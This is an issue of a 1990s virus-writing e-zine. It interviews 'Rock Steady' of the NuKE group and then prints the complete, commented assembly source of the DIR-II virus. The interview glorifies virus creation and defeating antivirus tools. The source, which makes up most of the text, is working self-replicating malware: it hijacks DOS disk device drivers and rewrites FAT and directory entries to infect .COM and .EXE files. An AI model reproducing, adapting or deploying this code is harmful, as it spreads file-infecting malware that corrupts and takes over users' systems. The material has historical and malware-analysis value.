DnA 5-14: Interview With Rock Steady (with .ASM)
WELCOME DnA ADDICTS to JACKEL's CORNER
This forum is open to those whose interests touch on the weakness, as well as those who wish to protect all from evil. This Forum will also be your access to the people who make it happen. We look forward to interviews with the entire NuKE Staff, the people at Phal/Skis, Y.A. Mcafee, ect. I also hope to draw the interest of those in the A.V sector; Dr.Solly, ect. Rebutal is only fair. There will be no FLAMMING, just the FACTS.
I can be reached by E-Mail at "DIGITAL DECAY." If you don't have the number, you can reach me on NuKE Net / NuKE the WoRLd; otherwise, download the latest copy of the "CRYPTLTR (Crypt News Letter), I believe that #18 is the latest issue.
This Months "FEATURED WRITER" is "ROCK STEADY" of "NuKE"
<J> HI <!>ROCK STEADY , this is Jackel<George>. I want to thank you for taking the time to do this interview with me. I know your busy and I have my questions here, so if you like we can get started.
<RS> Sure, no problem.
<J> In my last interview with ARiSToTLe, I felt that it was important to show the difference between how you are perceived, and who you really are. Lets go back in time, back to when you first realized the ultimate entertainment was the "computer."
<RS> The wonder years, ahh... Let me see... Ahh yes, as a young lad, I remember a keen sense towards, `getting away with things', I always got a kick in doing things others found either difficult or just couldn't do. And then, I saw it, it was the perfect movie, based on my type of personality. The stunning movie, was `Wargames' which was a thrilling 1984 movie. I watched with eyes glued to the screen. I then knew, I would _never_ truely rest until, I would be amazing on a computer. I had to master it, if you may say so, and I did, to the point whereby I'm almost lethally armed when with a computer. I'll never forget that first PC, I got it that same year, after begging mommy & daddy, that I'd be a `good little boy.' Yeah, I was armed with a 8MHz XT, 640k ram, with two flop- pies, and a truely amazing CGA monochrome monitor, and a mighty powerful 1200 modem.
The task wasn't easy, like everyone, I didn't know where to start, who to ask or what to do. Then in 1986, the scare began, (C) Brain virus hit the news- papers. A computer virus, how gullable I was, I ate up the newspaper reports like you wouldn't believe.
<J> I remember that, yes, very well. The scare of the Computer Virus was echoed around the world.
<RS> Yes and I warshipped The Computer Virus. It was almost human to myself, imagine a piece of code, able to live, move, reproduce, make decisions, etc. It was almost biological. Man has been trying to `build' androids like ourselves for decades now, and here was another successful attempt!
<J> Ok,,I see the 'plot' thickens here. So,,, what did you do?
<RS> I knew then I had to learn, machine language, and I bought a book on the topic. And hence forward I had opened the gates for my everlasting conquest for information.
<J> ...And the rest is history. So tell me about your views on the so called underground 'groups.' Did you cross paths with any of the so called 'WareZ' junkies
<RS> My opinion on `Groups?' I was never fond of them. I always found groups to be more like "klubs" where childish kids hang-out, and hanging tough. Groups waste _so_ much constructive time, fighting for turf, I know, I did it for a while. I spent more time, fighting, picking fights, not only verbally, but at times Darkman and I with POD would bounce over to a kids home and `get respect' because he might of said something stoopid towards us. Frankly we almost got shot once, when the kid's older brother comes out with a 12 gauge shot gun. We were lucky I guess, because Darkman was crazy as fuck! Nothing scared Darkman, nothing. (Darkman and POD were two buddies I started with to get into the `Hacker' world.)
<J> So you say that 'groups' are where kids converge to create havok and and that there actions consist of 'hanging tough and acting childish. Some would consider this 'gang' activity..I have never percieved NuKE this way, what makes NuKE different?
<RS> Groups=gangs. But the actual organization of pooling 'our' knowledge into one, and getting in contact with people from all parts of the world is what has benefited NuKE. You can refer to us as an organization, rather than a `group'.
<J> Well put,,go on.
<RS> And the general `activities' of groups, are usually distructful. I spent lots of time, phreaking round the globe, and hacking. I could have used that time on more constructive work, nevertheless, I'd have missed out on a hole shit-load of fun. Which I'm glad I didn't. But it seems to be a stage of life one goes thru, unfortunately it clashes with the rest of society.
<J> What you perceive as the rest of society, is slowly changing their outlook on shared virus research. Sadly, until then, many will be the target of needless abuse. You have been the target on several occasions the year already, this must upset you !
<RS> I don't get offended anymore. Maybe in 1991, I'd have bounce to your place and `teach yeah respect', but that was a hormone thing. So if you mean getting upset on personally directed hate mail, No it doesn't affect me. As a matter of fact I don't recommend it either, as it will only make me continue doing what I do, simply because it bugs the hell outta yeah.
<J> Come on RocK, I know better. You have a quick wit, and an even quicker tongue. I've seen you trash (with eloquence) a user for a mindless post.
<RS> Ok, then again, I tend to get upset, at all the lies out there. I have waged a war based on political ethnics, and I won't stop till the last NuKEr falls. See NuKE has been publicly hated because of our backgrounds and doings. The AV and legislating bodies see two things. The fir$t focu$ i$ to get mo'mony! The second, is that we (NuKE and alike) poss a threat to them, and getting rid of us would be like a dream come true. Imagine a car maker selling you a car, and right behind you, there's a few NuKErs showing you hardcore proof that this car is known to blow-up at a certain speed. Now, you wouldn't want to buy that car, would you? Nor do you wish to be `lied' to about its faultiness.
<J> Where does that acting body of NuKE have planed for 1994 and beyond?
<RS> The future of NuKE? I wish for it to be more of a political statue, on information. I know my background isn't `holy' I never said it was. But I will be honest to you about it, and whatever is happening in this choas Cyberspace we call home. NuKE perhaps wishes to educate people, of not falling into a technology trance. I could sit here 'n babble till my fingers drop, but I find it difficult to predict NuKE's future. I really don't know what is to happen. See I'm not fully aware of the public's overlook on NuKE.
<J> Well for one, I can tell you that in California, NuKE is well respected.
<RS> Good, and I can tell you this, we have a table of talented people here, extremely talented folks. Perhaps our backgrounds, that are looked upon as being `evil' can be our best traits! Who do you want your security software consultant coming from? The multi-million dollar slick Jack, that has no idea what the most important issues of computer security is. Or a talented individual that has an ability to gulp vast sizes of information and cut through the chase in what a security package should consists of, as he has seen the flaws of the competitors' package?
<RS> I leave it up to the people, and that if we are given a fair chance, we will come out shining. Not only morally and ethnically, but legally too.
<J> Take your alltime favorite Virus and tell us how it works and why you find it unusual...
<RS> Ahh, so many viruses come to mind. The fact of the matter is that there is only a hand-full of viruses out there, that are really good. I judge them as my favourite viruses by the amount of research has been put into creating it. And also in its ability to tamper with new ideas. Such viruses are like DIR-][, SVC, Tremor, Cheeba, ExeBug...
<RS> Each tamper with features that were once unique when they were found. I cannot begin to explain these viruses, or many others that don't come to mind just yet, but I find them remarkable nevertheless. But to take one virus, it would have to be DIR-][, as it stumbled _so_ many people. A fast lecture, of one of the most interesting parts, was that this virus didn't use any DOS Interrupts to call it. Normally the executable program calls the virus, which makes the virus call DOS, but DIR-][ goes in such a way that it makes DOS call it. It goes to a much lower plat-form. I found that to be amazing, believe it or not, this feature stumbled _so_ many people. Not many people even know NOW that DIR-][ doesn't hook any interrupts, but acts more as a device driver. I think those at McAfee may learn something by reading this paragraph. Who knows, maybe Patty Hoffman will update her DIR-][ description now?
<RS> Again, its the originalty of the virus that strikes me. Doing things never done before, or making some AV products look like an ass, like I did with TBClean. I have no intention of destruction, but for the technology advancement of viruses and computer security.
<J> Thank you Rock Steady, it has been a pleasure.
Ok,, well,, Like I have said all along, NuKE represents themselves with honest, straight forward answers. Their ideology rests on the an inherent belief passed down from generation to generation.
You can fool 'some' of the people all the time
You can fool 'all' of the people some of the time
But you CAN'T fool 'all' the people, 'all' the time.
Next issue, We will talk with a fellow who is nowhere to be found :)
Till then,,
Scan everything ! ıÖcKäL
Nuke NET @ is a trademark of NuKE. Do not except imitations !!!
@NuKE NET can now be reached at Digital Decay, Orange County California. If you would like to poll from our HUB, please download a copy of Cryptinfo Journal #17 or 18,, for our #.<J>
Greetings to Urnst Kouch, #18 was exceptional !
DIR-2.ASM
; DIR ][
i13org = 5f8h
i21org = 5fch
dir_2 segment byte public
assume cs:dir_2, ds:dir_2
org 100h
start:
mov sp,600h ; Set up the stack pointer
inc word ptr counter ; Generation counter
xor cx,cx
mov ds,cx ; DS points to interrupt table
lds ax, ds:[0c1h] ; Find interrupt 30h
add ax,21h ; Change it to Int 21h
push ds ; Save it on stack for use by
push ax ; subroutine "jump"
mov ah,30h ; Get DOS version
call jump
cmp al,4 ; DOS 4.X+ : SI = 0
sbb si,si ; DOS 2/3 : SI = -1
mov byte ptr [drive+2],byte ptr -1 ; Initialise last drive to
; "never accessed"
mov bx,60h ; Adjust memory in ES to
mov ah,4ah ; BX paragraphs.
call jump
mov ah,52h ; Get DOS List of Lists
call jump ; to ES:BX
push es:[bx-2] ; Save Segment of first MCB
lds bx,es:[bx] ; DS:BX -> 1st DPB
; (Drive parameter block)
search: mov ax,[bx+si+15h] ; Get segment of device driver
cmp ax,70h ; Is it CONFIG? (I think)
jne next ; If not, try again
xchg ax,cx ; Move driver segment to CX
mov [bx+si+18h],byte ptr -1 ; Flag block must be rebuilt
mov di,[bx+si+13h] ; Save offset of device driver
; Original device driver
; address in CX:DI
mov [bx+si+13h],offset header ; Replace with our own
mov [bx+si+15h],cs ; (header)
next: lds bx,[bx+si+19h] ; Get next device block
cmp bx,-1 ; Is it the last one?
jne search ; If not, search it
jcxz install
pop ds ; Restore segment of first
mov ax,ds ; MCB
add ax,ds:[3] ; Go to next MCB
inc ax ; AX = segment next MCB
mov dx,cs ; DX = MCB owning current
dec dx ; program
cmp ax,dx ; Are these the same?
jne no_boot ; If not, we are not currently
; in the middle of a reboot
add word ptr ds:[3],61h ; Increase length owned by
; MCB by 1552 bytes
no_boot: mov ds,dx ; DS = MCB owning current
; program
mov word ptr ds:[1],8 ; Set owner = DOS
mov ds,cx ; DS = segment of original
; device driver
les ax,[di+6] ; ES = offset int handler
; AX = offset strategy entry
mov word ptr cs:str_block,ax ; Save entry point
mov word ptr cs:int_block,es ; And int block for use in
; function _in
cld ; Scan for the write
mov si,1 ; function in the
scan: dec si ; original device driver
lodsw
cmp ax,1effh
jne scan
mov ax,2cah ; Wicked un-yar place o'
cmp [si+4],ax ; doom.
je right
cmp [si+5],ax
jne scan
right: lodsw
push cs
pop es
mov di,offset modify+1 ; Save address of patch
stosw ; area so it can be changed
xchg ax,si ; later.
mov di,offset i13org ; This is in the stack, but
cli ; it is used by "i13pr"
movsw
movsw
mov dx,0c000h ; Scan for hard disk ROM
; Start search @ segment C000h
fdsk1: mov ds,dx ; Load up the segment
xor si,si ; atart at offset 0000h
lodsw ; Scan for the signature
cmp ax,0aa55h ; Is it the signature?
jne fdsk4 ; If not, change segment
cbw ; clear AH
lodsb ; load a byte to AL
mov cl,9
sal ax,cl ; Shift left, 0 filled
fdsk2: cmp [si],6c7h
jne fdsk3
cmp word ptr [si+2],4ch
jne fdsk3
push dx ; Save the segment
push [si+4] ; and offset on stack
jmp short death ; for use by i13pr
install: int 20h
file: db "c:",255,0
fdsk3: inc si ; Increment search offset
cmp si,ax ; If we are not too high,
jb fdsk2 ; try again
fdsk4: inc dx ; Increment search segment
cmp dh,0f0h ; If we are not in high
jb fdsk1 ; memory, try again
sub sp,4 ; effectively push dummy vars.
death: push cs ; on stack for use by i13pr
pop ds
mov bx,ds:[2ch] ; Get environment from PSP
mov es,bx
mov ah,49h ; Release it (to save memory)
call jump
xor ax,ax
test bx,bx ; Is BX = 0?
jz boot ; If so, we are booting now
mov di,1 ; and not running a file
seek: dec di ; Search for end of
scasw ; the environment block
jne seek
lea si,[di+2] ; SI points to filename
jmp short exec ; (in DOS 3.X+)
; Execute that file
boot: mov es,ds:[16h] ; get PSP of parent
mov bx,es:[16h] ; get PSP of parent
dec bx ; go to its MCB
xor si,si
exec: push bx
mov bx,offset param ; Set up parameter block
; for EXEC function
mov [bx+4],cs ; segment to command line
mov [bx+8],cs ; segment to 1st FCB
mov [bx+12],cs ; segment to 2nd FCB
pop ds
push cs
pop es
mov di,offset f_name
push di ; Save filename offset
mov cx,40 ; Copy the filename to
rep movsw ; the buffer
push cs
pop ds
mov ah,3dh ; Handle open file
mov dx,offset file ; "c:ˇ",0
call jump
pop dx ; DS:DX -> filename
mov ax,4b00h ; Load and Execute
call jump ; ES:BX = param block
mov ah,4dh ; Get errorlevel
call jump
mov ah,4ch ; Terminate
jump: pushf ; Simulate an interrupt 21h
call dword ptr cs:[i21org]
ret
;--------Installation complete
i13pr: mov ah,3 ; Write AL sectors from ES:BX
jmp dword ptr cs:[i13org] ; to track CH, sector CL,
; head DH, drive DL
main: push ax ; driver
push cx ; strategy block
push dx
push ds
push si
push di
push es ; Move segment of parameter
pop ds ; block to DS
mov al,[bx+2] ; [bx+2] holds command code
cmp al,4 ; Input (read)
je input
cmp al,8 ; Output (write)
je output
cmp al,9 ; Output (write) with verify
je output
call in_ ; Call original device
cmp al,2 ; Request build BPB
jne ppp ; If none of the above, exit
lds si,[bx+12h] ; DS:SI point to BPB table
mov di,offset bpb_buf ; Replace old pointer with
mov es:[bx+12h],di ; a pointer to our own
mov es:[bx+14h],cs ; BPB table
push es ; Save segment of parameters
push cs
pop es
mov cx,16 ; Copy the old BPB table to
rep movsw ; our own
pop es ; Restore parameter segment
push cs
pop ds
mov al,[di+2-32] ; AL = sectors per allocation
cmp al,2 ; unit. If less than
adc al,0 ; 2, increment
cbw ; Extend sign to AH (clear AH)
cmp word ptr [di+8-32],0 ; Is total number sectors = 0?
je m32 ; If so, big partition (>32MB)
sub [di+8-32],ax ; Decrease space of disk by
; one allocation unit(cluster)
jmp short ppp ; Exit
m32: sub [di+15h-32],ax ; Handle large partitions
sbb word ptr [di+17h-32],0
ppp: pop di
pop si
pop ds
pop dx
pop cx
pop ax
rts: retf ; We are outta here!
output: mov cx,0ff09h
call check ; is it a new disk?
jz inf_sec ; If not, go away
call in_ ; Call original device handler
jmp short inf_dsk
inf_sec: jmp _inf_sec
read: jmp _read
read_: add sp,16 ; Restore the stack
jmp short ppp ; Leave device driver
input: call check ; Is it a new disk?
jz read ; If not, leave
inf_dsk: mov byte ptr [bx+2],4 ; Set command code to READ
cld
lea si,[bx+0eh] ; Load from buffer address
mov cx,8 ; Save device driver request
save: lodsw ; on the stack
push ax
loop save
mov word ptr [bx+14h],1 ; Starting sector number = 1
; (Read 1st FAT)
call driver ; Read one sector
jnz read_ ; If error, exit
mov byte ptr [bx+2],2 ; Otherwise build BPB
call in_ ; Have original driver do the
; work
lds si,[bx+12h] ; DS:SI points to BPB table
mov ax,[si+6] ; Number root directory entries
add ax,15 ; Round up
mov cl,4
shr ax,cl ; Divide by 16 to find sectors
; of root directory
mov di,[si+0bh] ; DI = sectors/FAT
add di,di ; Double for 2 FATs
stc ; Add one for boot record
adc di,ax ; Add sector size of root dir
push di ; to find starting sector of
; data (and read)
cwd ; Clear DX
mov ax,[si+8] ; AX = total sectors
test ax,ax ; If it is zero, then we have
jnz more ; an extended partition(>32MB)
mov ax,[si+15h] ; Load DX:AX with total number
mov dx,[si+17h] ; of sectors
more: xor cx,cx
sub ax,di ; Calculate FAT entry for last
; sector of disk
sbb dx,cx
mov cl,[si+2] ; CL = sectors/cluster
div cx ; AX = cluster #
cmp cl,2 ; If there is more than 1
sbb ax,-1 ; cluster/sector, add one
push ax ; Save cluster number
call convert ; AX = sector number to read
; DX = offset in sector AX
; of FAT entry
; DI = mask for EOF marker
mov byte ptr es:[bx+2],4 ; INPUT (read)
mov es:[bx+14h],ax ; Starting sector = AX
call driver ; One sector only
again: lds si,es:[bx+0eh] ; DS:SI = buffer address
add si,dx ; Go to FAT entry
sub dh,cl ; Calculate a new encryption
adc dx,ax ; value
mov word ptr cs:gad+1,dx ; Change the encryption value
cmp cl,1 ; If there is 0 cluster/sector
je small_ ; then jump to "small_"
mov ax,[si] ; Load AX with offset of FAT
; entry
and ax,di ; Mask it with value from
; "convert" then test to see
; if the sector is fine
cmp ax,0fff7h ; 16 bit reserved/bad
je bad
cmp ax,0ff7h ; 12 bit reserved/bad
je bad
cmp ax,0ff70h ; 12 bit reserved/bad
jne ok
bad: pop ax ; Tried to replicate on a bad
dec ax ; cluster. Try again on a
push ax ; lower one.
call convert ; Find where it is in the FAT
jmp short again ; and try once more
small_: not di ; Reverse mask bits
and [si],di ; Clear other bits
pop ax ; AX = cluster number
push ax
inc ax ; Need to do 2 consecutive
push ax ; bytes
mov dx,0fh
test di,dx
jz here
inc dx ; Multiply by 16
mul dx
here: or [si],ax ; Set cluster to next
pop ax ; Restore cluster of write
call convert ; Calculate buffer offset
mov si,es:[bx+0eh] ; Go to FAT entry (in buffer)
add si,dx
mov ax,[si]
and ax,di
ok: mov dx,di ; DI = mask from "convert"
dec dx
and dx,di ; Yerg!
not di
and [si],di
or [si],dx ; Set [si] to DI
cmp ax,dx ; Did we change the FAT?
pop ax ; i.e. Are we already on this
pop di ; disk?
mov word ptr cs:pointer+1,ax ; Our own starting cluster
je _read_ ; If we didn't infect, then
; leave the routine. Oh
; welp-o.
mov dx,[si]
push ds
push si
call write ; Update the FAT
pop si
pop ds
jnz _read_ ; Quit if there's an error
call driver
cmp [si],dx
jne _read_
dec ax
dec ax
mul cx ; Multiply by sectors/cluster
; to find the sector of the
; write
add ax,di
adc dx,0
push es
pop ds
mov word ptr [bx+12h],2 ; Byte/sector count
mov [bx+14h],ax ; Starting sector #
test dx,dx
jz less
mov word ptr [bx+14h],-1 ; Flag extended partition
mov [bx+1ah],ax ; Handle the sector of the
mov [bx+1ch],dx ; extended partition
less: mov [bx+10h],cs ; Transfer address segment
mov [bx+0eh],100h ; and the offset (duh)
call write ; Zopy ourselves!
; (We want to travel)
_read_: std
lea di,[bx+1ch] ; Restore device driver header
mov cx,8 ; from the stack
load: pop ax
stosw
loop load
_read: call in_ ; Call original device handler
mov cx,9
_inf_sec:
mov di,es:[bx+12h] ; Bytes/Sector
lds si,es:[bx+0eh] ; DS:SI = pointer to buffer
sal di,cl ; Multiply by 512
; DI = byte count
xor cl,cl
add di,si ; Go to address in the buffer
xor dl,dl ; Flag for an infection in
; function find
push ds
push si
call find ; Infect the directory
jcxz no_inf
call write ; Write it back to the disk
and es:[bx+4],byte ptr 07fh ; Clear error bit in status
; word
no_inf: pop si
pop ds
inc dx ; Flag for a decryption in
; function find
call find ; Return right information to
; calling program
jmp ppp
;--------Subroutines
find: mov ax,[si+8] ; Check filename extension
cmp ax,"XE" ; in directory structure
jne com
cmp [si+10],al
je found
com: cmp ax,"OC"
jne go_on
cmp byte ptr [si+10],"M"
jne go_on
found: test [si+1eh],0ffc0h ; >4MB ; Check file size high word
jnz go_on ; to see if it is too big
test [si+1dh],03ff8h ; <2048B ; Check file size low word
jz go_on ; to see if it is too small
test [si+0bh],byte ptr 1ch ; Check attribute for subdir,
jnz go_on ; volume label or system file
test dl,dl ; If none of these, check DX
jnz rest ; If not 0, decrypt
pointer: mov ax,1234h ; mov ax, XX modified elsewhere
cmp ax,[si+1ah] ; Check for same starting
; cluster number as us
je go_on ; If it is, then try another
xchg ax,[si+1ah] ; Otherwise make it point to
; us.
gad: xor ax,1234h ; Encrypt their starting
; cluster
mov [si+14h],ax ; And put it in area reserved
; by DOS for no purpose
loop go_on ; Try another file
rest: xor ax,ax ; Disinfect the file
xchg ax,[si+14h] ; Get starting cluster
xor ax,word ptr cs:gad+1 ; Decrypt the starting cluster
mov [si+1ah],ax ; and put it back
go_on: db 2eh,0d1h,6 ; rol cs:[gad+1], 1
dw offset gad+1 ; Change encryption and
add si,32 ; go to next file
cmp di,si ; If it is not past the end of
jne find ; the buffer, then try again
ret ; Otherwise quit
check: mov ah,[bx+1] ; ah = unit code (block device
; only)
drive: cmp ah,-1 ; cmp ah, XX can change.
; Compare with the last call
; -1 is just a dummy
; impossible value that will
; force the change to be true
mov byte ptr cs:[drive+2],ah ; Save this call's drive
jne changed ; If not the same as last call
; media has changed
push [bx+0eh] ; If it is the same physical
; drive, see if floppy has
; been changed
mov byte ptr [bx+2],1 ; Tell original driver to do a
call in_ ; media check (block only)
cmp byte ptr [bx+0eh],1 ; Returns 1 in [bx+0eh] if
pop [bx+0eh] ; media has not been changed
mov [bx+2],al ; Restore command code
changed: ret ; CF,ZF set if media has not
; been changed, not set if
; has been changed or we don't
; know
write: cmp byte ptr es:[bx+2],8 ; If we want OUTPUT, go to
jae in_ ; original device handler
; and return to caller
mov byte ptr es:[bx+2],4 ; Otherwise, request INPUT
mov si,70h
mov ds,si ; DS = our segment
modify: mov si,1234h ; Address is changed elsewhere
push [si]
push [si+2]
mov [si],offset i13pr
mov [si+2],cs
call in_ ; Call original device handler
pop [si+2]
pop [si]
ret
driver: mov word ptr es:[bx+12h],1 ; One sector
in_: ; in_ first calls the strategy
; of the original device
; driver and then calls the
; interrupt handler
db 09ah ; CALL FAR PTR
str_block:
dw ?,70h ; address
db 09ah ; CALL FAR PTR
int_block:
dw ?,70h ; address
test es:[bx+4],byte ptr 80h ; Was there an error?
ret
convert: cmp ax,0ff0h ; 0FFF0h if 12 bit FAT
jae fat_16 ; 0FF0h = reserved cluster
mov si,3 ; 12 bit FAT
xor word ptr cs:[si+gad-1],si ; Change the encryption value
mul si ; Multiply by 3 and
shr ax,1 ; divide by 2
mov di,0fffh ; Mark it EOF (low 12 bits)
jnc cont ; if it is even, continue
mov di,0fff0h ; otherwise, mark it EOF (high
jmp short cont ; 12 bits) and then continue
fat_16: mov si,2 ; 16 bit FAT
mul si ; Double cluster #
mov di,0ffffh ; Mark it as end of file
cont: mov si,512
div si ; AX = sector number
; (relative to start of FAT)
; DX = offset in sector AX
header: inc ax ; Increment AX to account for
ret ; boot record
counter: dw 0
dw 842h ; Attribute
; Block device
; DOS 3 OPEN/CLOSE removable
; media calls supported
; Generic IOCTL call supported
; Supports 32 bit sectors
dw offset main ; Strategy routine
dw offset rts ; Interrupt routine (rtf)
db 7fh ; Number of subunits supported
; by this driver. Wow, lookit
; it -- it's so large and juicy
; Parameter block format:
; 0 WORD Segment of environment
; 2 DWORD pointer to command line
; 6 DWORD pointer to 1st default FCB
;10 DWORD pointer to 2nd default FCB
param: dw 0,80h,?,5ch,?,6ch,?
bpb_buf: db 32 dup(?)
f_name: db 80 dup(?)
;--------The End.
dir_2 ends
end start
MsDos
